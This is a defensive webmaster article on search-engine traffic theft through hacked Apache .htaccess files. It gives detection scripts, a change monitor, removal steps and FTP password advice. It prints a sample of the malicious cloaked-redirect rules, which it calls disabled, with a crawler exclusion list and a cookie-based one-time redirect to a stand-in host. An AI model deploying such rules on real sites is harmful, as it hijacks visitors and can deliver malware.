Are They Stealing Your Search Engine Traffic?
Your .htaccess file can be used to redirect traffic from search engines to a thief's website.
If your site has been hacked in this way, then when someone finds you in a search engine and clicks on a link to go to your site, they are taken to the thief's site, instead.
The links in the search result go to your site, just like they're supposed to. But, your site redirects the visitor to the traffic thief's site.
Search engine robots are not redirected. Neither are RSS feed fetchers and other page-retrieving software on the thief's exclusion list.
If the redirect page is designed to plant a trojan or virus that works only in certain browsers, other browsers might not be redirected at all.
The thief is even sneakier than that. When a browser is redirected, a cookie is set so the redirect happens only once for any specific browser. (Once is enough to infect a computer, or to accomplish whatever else the traffic thief intends.)
Site owners who happen to use a targeted browser may be redirected when clicking a search result link to their own site, yet their alarm may not last. When they return to repeat the redirect, the search result links take them to their site, just as they should. They may assume they inadvertently clicked the wrong link the first time.
Thus, testing search result links yourself might not reveal traffic theft. If your browser is on the "do not redirect" list or already has the thief's cookie, it won't be redirected.
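One way around the cookie and the "do not redirect" list is to request a page with a script that sends no cookies, a search engine referrer, and a browser-style User-Agent. The following is only a minimal sketch: the SEARCH_REFERER and BROWSER_UA values and the function names are hypothetical, and a thief's code may key on different values than the ones assumed here. A harmless redirect between the www and non-www forms of your own domain is also reported as off-site, so check each result by hand.

```python
import http.client
from urllib.parse import urlsplit

# Hypothetical values for illustration only. Substitute a referrer and a
# User-Agent string copied from a browser you want to test.
SEARCH_REFERER = "https://www.google.com/search?q=example"
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
              "AppleWebKit/537.36 (KHTML, like Gecko) "
              "Chrome/120.0 Safari/537.36")

REDIRECT_CODES = (301, 302, 303, 307, 308)


def is_offsite_redirect(status, location, host):
    """Return True if the response redirects to a different host name."""
    if status not in REDIRECT_CODES or not location:
        return False
    target = urlsplit(location).hostname
    # A relative Location has no host name, so it stays on the same site.
    return target is not None and target.lower() != host.lower()


def probe(url):
    """Request url once, without cookies, as if arriving from a search result.

    http.client does not follow redirects, so the first response is
    inspected exactly as the server sent it.
    """
    parts = urlsplit(url)
    if parts.scheme == "https":
        conn = http.client.HTTPSConnection(parts.netloc, timeout=10)
    else:
        conn = http.client.HTTPConnection(parts.netloc, timeout=10)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        conn.request("GET", path, headers={
            "Referer": SEARCH_REFERER,
            "User-Agent": BROWSER_UA,
        })
        resp = conn.getresponse()
        location = resp.getheader("Location")
        offsite = is_offsite_redirect(resp.status, location, parts.hostname)
        return resp.status, location, offsite
    finally:
        conn.close()

# Example use (replace with a page on your own site):
# status, location, offsite = probe("https://www.example.com/")
```

A clean result proves little, because the thief may target a browser or referrer the script did not imitate. Inspecting the .htaccess files themselves remains the reliable check.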
The .htaccess file is a feature of the Apache server software. Apache is used to serve web pages on the majority of Unix/Linux and some Microsoft operating system hosting computers.
How To Spot Search Engine Traffic Theft
Thieves steal search traffic by updating .htaccess files and/or creating new ones.
Check your .htaccess files for code that doesn't belong there. Check subdirectories for .htaccess files that shouldn't be there or that contain strange code.
I've seen two infections.
- In one, the thief updated existing .htaccess files with the redirect code. The site owner saw nothing amiss because the site operated just as before.
- In the other, the thief replaced existing .htaccess files so they contained only the redirect code. The site owner knew immediately something was wrong because the site didn't work the same way.
Below is a disabled version of search traffic theft code. Enough of the original is intact that you should be able to recognize it if you find it in your .htaccess file. The redirect code you find may differ, depending on the traffic thief's purpose.
The one sure way to recognize a hacked .htaccess file is if the file contains code that is not supposed to be there.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} !^GET$
RewriteCond %{HTTP_REFERER} !^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?)$ [NC]
RewriteCond %{HTTP_REFERER} !^(q\=cache\:)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg)$ [NC]
RewriteCond %{HTTP_COOKIE} !^xccgtswgokoe$
RewriteCond %{HTTPS} !^off$
RewriteRule ^(.*)$ http://example.com/cgi-bin/r.cgi?p=10003&i=9910ed08&j=321&m=2c45b045a525fde6b3ef6f17e8c878f8&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
Because the redirect code uses the Apache rewrite engine, it affects the directory that holds the infected .htaccess file, but by default it is not inherited by a subdirectory whose own .htaccess file contains rewrite directives. Therefore, the thief is likely to put the redirect code into numerous, perhaps all, subdirectories.
Check every subdirectory when looking for infection.
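Checking every subdirectory by hand is tedious, so a short script can list each .htaccess file and flag the directives that the sample code relies on. What follows is a minimal sketch, not a complete detector: the pattern list and the function names are assumptions drawn from the sample in this article, and a thief's code may look different. Legitimate files, such as hotlink protection rules, can trigger some of these patterns too, so treat each finding as a reason to open the file and read it.

```python
import os
import re

# Heuristic patterns based on the sample redirect code in this article.
# This is an assumed, incomplete list, not a signature database.
SUSPICIOUS = {
    "referer condition": re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}", re.I),
    "user-agent condition": re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I),
    "cookie condition": re.compile(r"RewriteCond\s+%\{HTTP_COOKIE\}", re.I),
    "external rewrite target": re.compile(r"RewriteRule\s+\S+\s+https?://", re.I),
    "cookie-setting flag": re.compile(r"\[[^\]]*\bCO=", re.I),
}


def scan_text(text):
    """Return the sorted names of the suspicious patterns found in text."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))


def scan_tree(doc_root):
    """Yield (path, findings) for every .htaccess file under doc_root."""
    for dirpath, _dirs, files in os.walk(doc_root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                yield path, scan_text(fh.read())

# Example use (the path is a placeholder for your own document root):
# for path, findings in scan_tree("/path/to/document/root"):
#     print(path, findings or "no known patterns")
```

Every path the script prints deserves a look, even one with no findings, because a .htaccess file in an image or data directory may not belong there at all.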
The Files Monitor software can send you an email when files change or new files are added in specified directories. But the software has to be installed while the server is still clean in order to notify you when an infection occurs.
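The idea behind change monitoring can be illustrated with a small script that records a fingerprint of every .htaccess file while the site is known to be clean, then compares a later snapshot against it. This is only a sketch of the general technique. It is not how the Files Monitor software works, and the function names are hypothetical.

```python
import hashlib
import os


def snapshot(doc_root):
    """Map each .htaccess path under doc_root to the SHA-256 of its contents."""
    digests = {}
    for dirpath, _dirs, files in os.walk(doc_root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, "rb") as fh:
                digests[path] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare(baseline, current):
    """Return (added, changed, removed) lists of paths between two snapshots."""
    added = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current
                     if p in baseline and current[p] != baseline[p])
    removed = sorted(p for p in baseline if p not in current)
    return added, changed, removed

# Example use (the path is a placeholder for your own document root):
# baseline = snapshot("/path/to/document/root")   # taken while clean
# ...later...
# added, changed, removed = compare(baseline, snapshot("/path/to/document/root"))
```

The baseline is only trustworthy if it is taken before any infection and stored somewhere the thief cannot reach, such as off the server.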
How To Remove Search Engine Traffic Theft Infection
Remove the thief's redirect code from the .htaccess files. Or, if you have up-to-date backup files, upload the backups to overwrite the infected ones.
Check all subdirectories. Delete .htaccess files that don't belong there. Remove offending code or replace .htaccess files as necessary.
It is important to check all subdirectories. In one of the infections I've seen, every subdirectory was infected, including image and data directories.
Ways To Prevent Search Engine Traffic Theft
Be close-fisted with your FTP password. If someone needs FTP access, either make a separate temporary FTP account or change the FTP password after the person has completed their project.
Both search engine traffic theft infections I've seen occurred because the FTP credentials were compromised.
Whenever someone else needs an FTP password, always provide it through a secure form, by fax, or over the telephone. A secure form is on a web page with an https:// URL, not http://. Never use email; it is not secure.
Use FTP only on trusted connections. (Public WiFi is not to be trusted.) Secure FTP (SFTP) is better than regular FTP, as the password and data transfers are encrypted.
If FTP passwords are stored on your computer or on the computer of anyone who has had FTP access to your server, a trojan or a virus infection can send thieves the FTP credentials.
Although not specifically about FTP password compromises, the Ask Leo article "9 ways your account can be compromised" is a great reminder of how easy it really is to inadvertently provide a password to a thief.
To recap: Provide FTP passwords only if necessary and only in a secure manner. Change FTP passwords or delete the FTP accounts after others have finished using them. Practice password security. Keep your computers infection-free.
What To Do Right Now
To verify that your domain's .htaccess files are not stealing your search engine traffic, check the document root .htaccess file for anything that does not belong there. (The document root is the directory where a domain's main or index file is located.) Then, do the same for each subdirectory.
Will Bontrager